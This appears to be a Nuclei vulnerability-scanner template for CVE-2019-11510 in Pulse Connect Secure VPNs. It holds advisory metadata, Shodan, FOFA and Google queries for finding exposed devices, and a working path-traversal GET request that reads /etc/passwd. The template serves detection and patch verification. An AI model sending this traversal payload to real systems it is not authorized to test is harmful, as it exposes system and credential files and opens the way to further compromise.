id: CVE-2019-11510 info: name: Pulse Connect Secure SSL VPN Arbitrary File Read author: organiccrap severity: critical description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access. impact: | An attacker can access sensitive information stored on the system, potentially leading to further compromise. remediation: | Apply the latest security patches and updates provided by Pulse Secure. reference: - https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/ - https://nvd.nist.gov/vuln/detail/CVE-2019-11510 - http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html - http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 epss-score: 0.97267 epss-percentile: 0.99828 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: connect_secure shodan-query: - http.html:"welcome.cgi?p=logo" - http.title:"ivanti connect secure" fofa-query: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti http: - method: GET path: - "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502203cb09d5fcff94c6163b87658b3fdc7e6e18e972e859425a541c521543a2e5f2b022100e5e8e743f385d0126a8f435ef7dd64fdf54130d31f622f09bef068fbfc616479:922c64590222798bb761d5b6d8e72950